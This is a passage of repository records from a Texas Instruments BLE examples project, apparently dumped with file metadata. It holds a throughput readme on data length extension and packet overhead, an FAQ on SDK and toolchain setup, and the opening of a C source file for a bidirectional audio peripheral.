length\nextension. Please refer to [LE Data Length Extension](http://software-dl.ti.com/lprf/ble5stack-docs-latest/docs/ble5stack/ble_user_guide/html/ble-stack/data-length-extensions.html)\nin the BLE5-Stack User's Guide for more information.\n\nData length extension (DLE) is supported by CC2650/CC2640R2 devices running\nBLE5-Stack as well as BLE-Stack. 
This throughput example has been updated to use\nDLE.\n\nWith DLE enabled, the LE controller can spend more time sending application\ndata and less time processing packet overhead, thus increasing throughput.\n\nIn order to optimize the pipe between the two devices, the ATT\\_MTU is limited\nto be 251 bytes (instead of 255). As mentioned above, the largest data payload\nsupported by the controller is 251 bytes. Setting ATT\\_MTU to be 255 would cause\nthe controller to have to fragment and recombine host data packets at the link\nlayer. This will negatively affect throughput. This is because there is overhead\nfor each data packet sent. See the packet overhead section for more details.\n\nNote that not all 4.2 devices will support DLE. Throughput to mobile devices\nmay be limited based on the capabilities of the device's BLE stack.\n\n### Connection Interval\n\nDepending on the amount of post/pre-processing, the controller needs 2-3ms to\nprepare for the next connection event. Therefore, longer connection intervals\nallow for higher throughput as there is less downtime where notifications are\nnot being sent. This example will use a connection interval of 200ms. Note that\nthere is a significant downside to using higher intervals in a real world\nscenario: missed connection events due to RF interference will drastically\ndecrease the throughput.\nTherefore, it is up to the user to decide what throughput / latency tradeoff is\ndesired. Note that there is not much of a throughput increase after ~100ms\nconnection interval.\n\n### Notification Queuing\n\nThe case considered here assumes that the application is able to queue up\nnotifications quickly enough so that there is always a notification\nready to be sent when a slot opens. This is achieved by the application\nRTOS task running in an infinite loop in ``throughput_peripheral.c``:\n\n```\n static void blastData()\n {\n uint16 len = MAX_PDU_SIZE-7;\n attHandleValueNoti_t noti;\n bStatus_t status;\n noti.handle = 0x1E;\n noti.len = len;\n\n while(1)\n {\n //attempt to allocate payload\n noti.pValue = (uint8 *)GATT_bm_alloc( 0, ATT_HANDLE_VALUE_NOTI, GATT_MAX_MTU, &len );\n\n if ( noti.pValue != NULL ) //if allocated\n {\n //place index\n noti.pValue[0] = (msg_counter >> 24) & 0xFF;\n noti.pValue[1] = (msg_counter >> 16) & 0xFF;\n noti.pValue[2] = (msg_counter >> 8) & 0xFF;\n noti.pValue[3] = msg_counter & 0xFF;\n status = GATT_Notification( 0, &noti, 0 ); //attempt to send\n if ( status != SUCCESS ) //if noti not sent\n {\n GATT_bm_free( (gattMsg_t *)&noti, ATT_HANDLE_VALUE_NOTI );\n }\n else //noti sent, increment counter\n {\n msg_counter++;\n }\n }\n else\n {\n //bleNoResources\n asm(\"NOP\");\n }\n }\n }\n```\n\nDue to other processing needs, a custom application may not be able to replicate\nor sustain this throughput (e.g., having to wait for payload data to arrive over\nthe serial interface). In addition, the blastData function maximizes enqueuing of\ndata (Notifications in this example), so it is expected to see\nGATT\\_Notification return a non-SUCCESS status, such as blePending when the\nqueue is full. When this status is returned, the BLE5-Stack will gradually clear\nthe Tx queue as channel conditions permit, thus allowing the application to\nenqueue more GATT Notifications once the queue clears. The depth of the Tx queue\nis determined by the MAX\\_NUM\\_PDU define listed above. Note that the LED pins\nare used for debugging. 
Under maximum throughput conditions, you may expect to\nsee a high number of blePending (non-SUCCESS) status results from calling\nGATT\\_Notification.\n\n### Packet Overhead\n\nThe host and controller data payloads have been optimized to be 251 bytes.\nThis is the maximum value that makes sense for optimizing throughput.\n\nHowever, not all 251 bytes can be used as application data due to overhead at\nthe ATT and L2CAP levels. These headers are required by the Bluetooth spec and\ncannot be changed. A brief description of this is shown below.\n\n#### ATT Notification Header\n\nAll ATT notification packets have a 3 byte header required to identify the\nopcode and handle of the attribute that is sending the notification.\n\nThere is a 3 byte overhead to sending an ATT notification.\n\n#### L2CAP Header\n\nAt the L2CAP layer, similar overhead is required to set the length of the packet\nand the proper channel identifier (CID).\n\nEach of these fields are 16-bits (2 bytes) resulting in 4 bytes of L2CAP\noverhead.\n\nCombining the L2CAP and ATT packet overhead yields:\n\n TOTAL_PACKET_OVERHEAD = 7 bytes\n"
},
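The packet overhead accounting at the end of the readme above (3-byte ATT notification header plus 4-byte L2CAP header) fixes the usable payload per 251-byte PDU at 244 bytes. A small self-contained check of that arithmetic follows; the constant names are illustrative restatements of the readme's numbers.

```c
#include <stdio.h>

/* The readme's numbers, restated as constants. */
enum
{
    LL_DATA_PDU_BYTES  = 251, /* max controller payload with DLE */
    L2CAP_HDR_BYTES    = 4,   /* 16-bit length + 16-bit channel ID */
    ATT_NOTI_HDR_BYTES = 3    /* opcode + attribute handle */
};

int main(void)
{
    int overhead = L2CAP_HDR_BYTES + ATT_NOTI_HDR_BYTES; /* 7 bytes */
    int payload  = LL_DATA_PDU_BYTES - overhead;         /* 244 bytes */

    printf("overhead per notification: %d bytes\n", overhead);
    printf("usable GATT payload: %d of %d bytes (%.1f%%)\n",
           payload, LL_DATA_PDU_BYTES,
           100.0 * payload / LL_DATA_PDU_BYTES);
    return 0;
}
```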
{
"alpha_fraction": 0.69197678565979,
"alphanum_fraction": 0.7197246551513672,
"avg_line_length": 45.9595947265625,
"blob_id": "ff864d0940f047a41f10fb423e82248a52d40321",
"content_id": "a6b969f135ed5cfe145d92e94aaf0d0ce025269e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4653,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 99,
"path": "/docs/faq.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "## Frequently Asked Questions\n\n* [What if I installed the SimpleLink CC2640R2 SDK at a non default location (e.g. Not at ``C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45``)?](#default)\n* [Why am I getting an error when I am trying to run a Python script from the /tools folder?](#python)\n* [How can I setup my toolchain for use with the ble\\_examples repo?](#toolchain)\n* [I am using a LaunchPad device, how can I view display data?](#display)\n---\n\n### <a name=\"default\"></a>What if I installed the SimpleLink CC2640R2 SDK at a non default location (e.g. Not at ``C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45``)?\n\nAll projects reference files from the BLE stack using environment variables, you\ncan change this in your IDE's project files.\n\n**CCS**\n\nNo changes to the project is necessary. You just need to ensure that Code\nComposer Studio was able to discover the SimpleLink CC2640R2 SDK in the\navailable *RTSC Products* tab. See the [BLE5-Stack User's Guide][BLE5-Stack] or\nthe [BLE Software Developer's Guide][BLE-Stack] for more details.\n\n**IAR**\n\n1. Navigate to the sample project directory within the repo and open the\n `.custom_argvars` file.\n1. Update the value of ``SIMPLELINK_CORE_SDK_INSTALL_DIR`` to point to your\n custom installation directory where you installed the SimpleLink CC2640R2 SDK.\n\n---\n\n### <a name=\"python\"></a>Why am I getting an error when I am trying to run a Python script from the /tools folder?\n\nLikely your Python environment is not installed correctly. Please check the\nfollowing debug steps:\n\n1. All scripts in the tools folder use Python 2.7, ensure that you have this\n version installed to `C:\\Python27`\n1. Python scripts can be invoked using `python <script_name>.py` this requires\n adding Python to your environment variables.\n * Add ``C:\\Python27`` to the `PATH` variable within your Windows environment\n variables, see\n [windows env vars](https://www.java.com/en/download/help/path.xml) for more\n info.\n1. If you can run the script successfully but get a runtime error, you likely\n don't have the necessary python modules installed.\n * Python modules can be found by looking at the `import` statements at the top\n of the `.py` file. You can install Python modules using the Python package\n manager, pip.\n - Install Pip by following\n [these steps](http://stackoverflow.com/questions/4750806/how-do-i-install-pip-on-windows).\n The section \"Python 2 ≤ 2.7.8 and Python 3 ≤ 3.3\" will be most helpful.\n\n---\n\n### <a name=\"toolchain\"></a>How can I setup my toolchain for use with the ble\\_examples repo?\n\n**CCS**\n\nFor BLE5-Stack examples, see the *Developing in CCS* section in the\n[BLE5-Stack User's Guide][BLE5-Stack]\nfor BLE-Stack examples, see the *Developing with CCS* section of the\n[BLE Software Developer's Guide][BLE-Stack].\n\n**IAR**\n\nFor BLE5-Stack examples, see the *Developing in IAR* section in the\n[BLE5-Stack User's Guide][BLE5-Stack]\nfor BLE-Stack examples, see the *Developing with IAR* section of the\n[BLE Software Developer's Guide][BLE-Stack].\n\n---\n\n### <a name=\"display\"></a>I am using a LaunchPad device, how can I view display data?\nLaunchPad projects are already set up to use the tidriver Display. For more\ninformation about the Display driver please see the Display.h driver\ndocumentation in the Simplelink CC2640R2 SDK (`docs/tidrivers/tidriversAPI.html`)\n\nTo setup your PC to receive this data please follow the steps below:\n\n1. Install PuTTY or another serial terminal emulator\n1. 
Use the Windows Device Manager (Start → Run → `mmc devmgmt.msc`\n → Ok) to determine which COM port you should connect to:\n\n \n * Note the COM port number of the `XDS110 Class Application/User UART` listed.\n1. Configure PuTTY as a serial console with 115200 8N1.\n1. Fill in the Serial Line field with the COM port from above.\n1. When configured correctly, the program should look as below:\n\n\n| Main Screen | Serial Screen |\n|:---------------------------------------------:|:-------------------------------------:|\n|  |  |\n\n**You may need to unplug/replug your LaunchPad and restart PuTTY if you do not see any output.**\n\n---\n\n[BLE5-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/ble5stack/ble_user_guide/html/ble-stack-5.x-guide/index.html)\n[BLE-Stack]: (http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/blestack/ble_user_guide/html/ble-stack-3.x-guide/index.html)\n"
},
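The console output described in the FAQ above is produced through the TI Display driver over the XDS110 back-channel UART; the sources in this dump open it with `Display_open(Display_Type_ANY, NULL)`. A minimal sketch of that initialization, with illustrative error handling, is shown here.

```c
#include <ti/display/Display.h>

/* Sketch: open the Display driver that backs the PuTTY session described in
 * the FAQ. Display_Type_ANY selects the first available back end, which on a
 * LaunchPad is typically the XDS110 back-channel UART (115200 8N1 matches
 * the terminal settings above). */
int app_display_init(void)
{
    Display_Handle h = Display_open(Display_Type_ANY, NULL);

    if (h == NULL)
    {
        return -1; /* no display back end available */
    }

    Display_print0(h, 0, 0, "Hello over the back-channel UART");
    return 0;
}
```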
{
"alpha_fraction": 0.6205049157142639,
"alphanum_fraction": 0.6322389245033264,
"avg_line_length": 29.024911880493164,
"blob_id": "01d5ea25e7aa1097274630cbae76b0c669d9bff1",
"content_id": "3b66796f1a093263a598851c45e506c465f4705e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 42185,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 1405,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/src/app/simple_peripheral_bidirectional_audio.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: simple_peripheral_bidirectional_audio.c\n *\n * Description: This is the simple_peripheral example modified to send\n * audio data over BLE.\n *\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/BIOS.h>\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/display/Display.h>\n\n#include \"hci_tl.h\"\n#include \"gatt.h\"\n#include \"linkdb.h\"\n#include \"gapgattserver.h\"\n#include \"gattservapp.h\"\n\n#include \"peripheral.h\"\n#include \"gapbondmgr.h\"\n\n#include \"osal_snv.h\"\n#include \"icall_ble_api.h\"\n\n#include \"util.h\"\n\n#ifdef USE_RCOSC\n#include \"rcosc_calibration.h\"\n#endif //USE_RCOSC\n#include \"board_key.h\"\n\n#include \"board.h\"\n\n#include <profiles/audio_dle/audio_duplex.h>\n#include <profiles/audio_dle/audio_profile_dle.h>\n\n#include \"simple_peripheral_bidirectional_audio.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// Advertising interval when device is discoverable (units of 625us, 160=100ms)\n#define DEFAULT_ADVERTISING_INTERVAL 160\n\n// Limited discoverable mode advertises for 30.72s, and then stops\n// General discoverable mode advertises indefinitely\n#define DEFAULT_DISCOVERABLE_MODE GAP_ADTYPE_FLAGS_GENERAL\n\n// Minimum connection interval (units of 1.25ms, 8=10ms) if automatic\n// parameter update request is enabled\n#define DEFAULT_DESIRED_MIN_CONN_INTERVAL 8\n\n// Maximum connection interval (units of 1.25ms, 8=10ms) if automatic\n// parameter update request is enabled\n#define DEFAULT_DESIRED_MAX_CONN_INTERVAL 8\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_DESIRED_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms, 1000=10s) 
if automatic parameter\n// update request is enabled\n#define DEFAULT_DESIRED_CONN_TIMEOUT 1000\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST FALSE\n\n// Connection Pause Peripheral time value (in seconds)\n#define DEFAULT_CONN_PAUSE_PERIPHERAL 2\n\n// Task configuration\n#define SBP_TASK_PRIORITY 1\n\n\n#ifndef SBP_TASK_STACK_SIZE\n#define SBP_TASK_STACK_SIZE 864\n#endif\n\n// Internal Events for RTOS application\n#define SBP_STATE_CHANGE_EVT 0x0001\n#define SBP_CHAR_CHANGE_EVT 0x0002\n#define SBP_PAIRING_STATE_EVT 0x0004\n#define SBP_PASSCODE_NEEDED_EVT 0x0008\n#define SBP_CONN_EVT_END_EVT 0x0010\n#define SBP_KEY_CHANGE_EVT 0x0020\n#define SBP_AUDIO_EVT 0x0040\n\n// Internal Events for RTOS application\n#define SBP_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBP_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n#define SBP_PERIODIC_EVT Event_Id_00\n\n#define SBP_ALL_EVENTS (SBP_ICALL_EVT | \\\n SBP_QUEUE_EVT | \\\n SBP_PERIODIC_EVT)\n\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 2120\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// The combined overhead for L2CAP and ATT notification headers\n#define TOTAL_PACKET_OVERHEAD 7\n\n// GATT notifications for throughput example don't require an authenticated link\n#define GATT_NO_AUTHENTICATION 0\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header.\n uint8_t *pData; // event data\n} sbpEvt_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n\ntypedef struct\n{\n // Service and Characteristic discovery variables.\n uint16 audioStartCharValueHandle;\n uint16 audioDataCharValueHandle;\n uint16 audioVolumeCharValueHandle;\n uint8 lastRemoteAddr[B_ADDR_LEN];\n} SimpleBLEPeripheral_HandleInfo_t;\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n// Connection handle of current connection\nstatic uint16_t connHandle = INVALID_CONNHANDLE;\n\nstatic PIN_Config SBP_configTable[] =\n{\n Board_LED1 | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX,\n Board_LED2 | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX,\n Board_DIO25_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO26_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO27_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n Board_DIO28_ANALOG | PIN_GPIO_OUTPUT_EN | PIN_GPIO_HIGH | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* Debug IO initially high */\n PIN_TERMINATE\n};\n\nstatic PIN_State sbpPins;\nstatic PIN_Handle hSbpPins;\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock instances for internal periodic events.\nstatic Clock_Struct periodicClock;\n\n// Queue object used for app messages\nstatic Queue_Struct 
appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbpTask;\nChar sbpTaskStack[SBP_TASK_STACK_SIZE];\n\n// Profile state and parameters\n//static gaprole_States_t gapProfileState = GAPROLE_INIT;\n\n// GAP - SCAN RSP data (max size = 31 bytes)\nstatic uint8_t scanRspData[] =\n{\n // complete name\n 0x11, // length of this data (1 type byte + 16 name bytes)\n GAP_ADTYPE_LOCAL_NAME_COMPLETE,\n 'S',\n 'i',\n 'm',\n 'p',\n 'l',\n 'e',\n 'B',\n 'L',\n 'E',\n 'A',\n 'u',\n 'd',\n 'i',\n 'o',\n 'T',\n 'x',\n};\n\n// GAP - Advertisement data (max size = 31 bytes, though this is\n// best kept short to conserve power while advertising)\nstatic uint8_t advertData[] =\n{\n // Flags; this sets the device to use limited discoverable\n // mode (advertises for 30 seconds at a time) instead of general\n // discoverable mode (advertises indefinitely)\n 0x02, // length of this data\n GAP_ADTYPE_FLAGS,\n DEFAULT_DISCOVERABLE_MODE | GAP_ADTYPE_FLAGS_BREDR_NOT_SUPPORTED,\n // service UUID, to notify central devices what services are included\n // in this peripheral\n 0x03, // length of this data\n GAP_ADTYPE_16BIT_MORE, // some of the UUID's, but not all\n LO_UINT16(AUDIO_SERV_UUID),\n HI_UINT16(AUDIO_SERV_UUID)\n};\n\n// GAP GATT Attributes\nstatic uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"Simple BLE AudioTx\";\n\n// Globals used for ATT Response retransmission\nstatic gattMsgEvent_t *pAttRsp = NULL;\nstatic uint8_t rspTxRetry = 0;\n\nstatic uint8 serviceDiscComplete = FALSE;\nstatic uint16 serviceToDiscover = GATT_INVALID_HANDLE;\nstatic uint8 enableCCCDs = TRUE;\n\n// Handle info saved here after connection to skip service discovery.\nstatic SimpleBLEPeripheral_HandleInfo_t remoteHandles;\n\n/* Audio START characteristic */\nstatic uint16 audioStartCharValueHandle = GATT_INVALID_HANDLE;\nstatic uint16 audioStartCCCHandle = GATT_INVALID_HANDLE;\n/* Audio \"Data\" characteristic */\nstatic uint16 audioDataCharValueHandle = GATT_INVALID_HANDLE;\nstatic uint16 audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\nstatic void SimpleBLEPeripheral_init( void );\nstatic void SimpleBLEPeripheral_taskFxn(UArg a0, UArg a1);\n\nstatic uint8_t SimpleBLEPeripheral_processStackMsg(ICall_Hdr *pMsg);\nstatic uint8_t SimpleBLEPeripheral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLEPeripheral_processAppMsg(sbpEvt_t *pMsg);\nstatic void SimpleBLEPeripheral_processStateChangeEvt(gaprole_States_t newState);\n\nstatic void SimpleBLEPeripheral_sendAttRsp(void);\nstatic void SimpleBLEPeripheral_freeAttRsp(uint8_t status);\n\nstatic void SimpleBLEPeripheral_stateChangeCB(gaprole_States_t newState);\n\nstatic uint8_t SimpleBLEPeripheral_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData);\nstatic void SimpleBLEPeripheral_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs);\nvoid SimpleBLEPeripheral_keyChangeHandler(uint8 keys);\nstatic void SimpleBLEPeripheral_handleKeys(uint8_t shift, uint8_t keys);\n\nstatic void SimpleBLEPeripheral_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status);\nstatic void SimpleBLEPeripheral_processPairState(uint8_t state, uint8_t status);\nstatic void SimpleBLEPeripheral_processPasscode(uint8_t uiOutputs);\nstatic void SimpleBLEPeripheral_DiscoverService( uint16 
connHandle, uint16 svcUuid );\nstatic void SimpleBLEPeripheral_EnableNotification( uint16 connHandle, uint16 attrHandle );\n\n//static void SimpleBLECentral_SaveHandles( void );\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapRolesCBs_t SimpleBLEPeripheral_gapRoleCBs =\n{\n SimpleBLEPeripheral_stateChangeCB // Profile State Change Callbacks\n};\n\n// GAP Bond Manager Callbacks\nstatic gapBondCBs_t simpleBLEPeripheral_BondMgrCBs =\n{\n (pfnPasscodeCB_t) SimpleBLEPeripheral_passcodeCB, // Passcode callback\n SimpleBLEPeripheral_pairStateCB // Pairing state callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param None.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbpTaskStack;\n taskParams.stackSize = SBP_TASK_STACK_SIZE;\n taskParams.priority = SBP_TASK_PRIORITY;\n\n Task_construct(&sbpTask, SimpleBLEPeripheral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_init\n *\n * @brief Called during initialization and contains application\n * specific initialization (ie. hardware initialization/setup,\n * table initialization, power up notification, etc), and\n * profile initialization/setup.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_init(void)\n{\n // ******************************************************************\n // NO STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n#ifdef USE_RCOSC\n RCOSC_enableCalibration();\n#endif // USE_RCOSC\n\n HCI_LE_WriteSuggestedDefaultDataLenCmd(DLE_MAX_PDU_SIZE , DLE_MAX_TX_TIME);\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n dispHandle = Display_open(Display_Type_ANY, NULL);\n Display_print0(dispHandle, 0, 0, \"\\f\");\n\n Board_initKeys(SimpleBLEPeripheral_keyChangeHandler);\n\n // Setup the GAP\n GAP_SetParamValue(TGAP_CONN_PAUSE_PERIPHERAL, DEFAULT_CONN_PAUSE_PERIPHERAL);\n\n // Setup the GAP Peripheral Role Profile\n {\n // For all hardware platforms, device starts advertising upon initialization\n uint8_t initialAdvertEnable = TRUE;\n\n // By setting this to zero, the device will go into the waiting state after\n // being discoverable for 30.72 second, and will not being advertising again\n // until the enabler is set back to TRUE\n uint16_t advertOffTime = 0;\n\n uint8_t enableUpdateRequest = DEFAULT_ENABLE_UPDATE_REQUEST;\n uint16_t desiredMinInterval = DEFAULT_DESIRED_MIN_CONN_INTERVAL;\n uint16_t desiredMaxInterval = DEFAULT_DESIRED_MAX_CONN_INTERVAL;\n uint16_t desiredSlaveLatency = DEFAULT_DESIRED_SLAVE_LATENCY;\n uint16_t desiredConnTimeout = DEFAULT_DESIRED_CONN_TIMEOUT;\n\n // Set the GAP Role Parameters\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &initialAdvertEnable);\n 
GAPRole_SetParameter(GAPROLE_ADVERT_OFF_TIME, sizeof(uint16_t),\n &advertOffTime);\n\n GAPRole_SetParameter(GAPROLE_SCAN_RSP_DATA, sizeof(scanRspData),\n scanRspData);\n GAPRole_SetParameter(GAPROLE_ADVERT_DATA, sizeof(advertData), advertData);\n\n GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE, sizeof(uint8_t),\n &enableUpdateRequest);\n GAPRole_SetParameter(GAPROLE_MIN_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMinInterval);\n GAPRole_SetParameter(GAPROLE_MAX_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMaxInterval);\n GAPRole_SetParameter(GAPROLE_SLAVE_LATENCY, sizeof(uint16_t),\n &desiredSlaveLatency);\n GAPRole_SetParameter(GAPROLE_TIMEOUT_MULTIPLIER, sizeof(uint16_t),\n &desiredConnTimeout);\n }\n\n // Set the GAP Characteristics\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN, attDeviceName);\n\n // Set advertising interval\n {\n uint16_t advInt = DEFAULT_ADVERTISING_INTERVAL;\n\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MAX, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MAX, advInt);\n }\n\n // Setup the GAP Bond Manager. For more information see the section in the\n // User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Don't send a pairing request after connecting; the peer device must\n // initiate pairing\n uint8_t pairMode = GAPBOND_PAIRING_MODE_WAIT_FOR_REQ;\n // Use authenticated pairing: require passcode.\n uint8_t mitm = TRUE;\n // This device only has display capabilities. Therefore, it will display the\n // passcode during pairing. However, since the default passcode is being\n // used, there is no need to display anything.\n uint8_t ioCap = GAPBOND_IO_CAP_DISPLAY_ONLY;\n // Request bonding (storing long-term keys for re-encryption upon subsequent\n // connections without repairing)\n uint8_t bonding = TRUE;\n\n GAPBondMgr_SetParameter(GAPBOND_PAIRING_MODE, sizeof(uint8_t), &pairMode);\n GAPBondMgr_SetParameter(GAPBOND_MITM_PROTECTION, sizeof(uint8_t), &mitm);\n GAPBondMgr_SetParameter(GAPBOND_IO_CAPABILITIES, sizeof(uint8_t), &ioCap);\n GAPBondMgr_SetParameter(GAPBOND_BONDING_ENABLED, sizeof(uint8_t), &bonding);\n }\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPRole_StartDevice(&SimpleBLEPeripheral_gapRoleCBs);\n\n // Start Bond Manager\n VOID GAPBondMgr_Register(&simpleBLEPeripheral_BondMgrCBs);\n\n // Register with GAP for HCI/Host messages\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n HCI_LE_ReadMaxDataLenCmd();\n\n Display_print0(dispHandle, 0, 0, \"Audio Peripheral with DLE\");\n\n // Open pin structure for use\n hSbpPins = PIN_open(&sbpPins, SBP_configTable);\n\n AudioDuplex_open(dispHandle, hSbpPins,\n (pfnAudioDuplexCB_t)SimpleBLEPeripheral_setEvent);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_taskFxn\n *\n * @brief Application task entry point for the Simple BLE Peripheral.\n *\n * @param a0, a1 - not used.\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLEPeripheral_init();\n\n // 
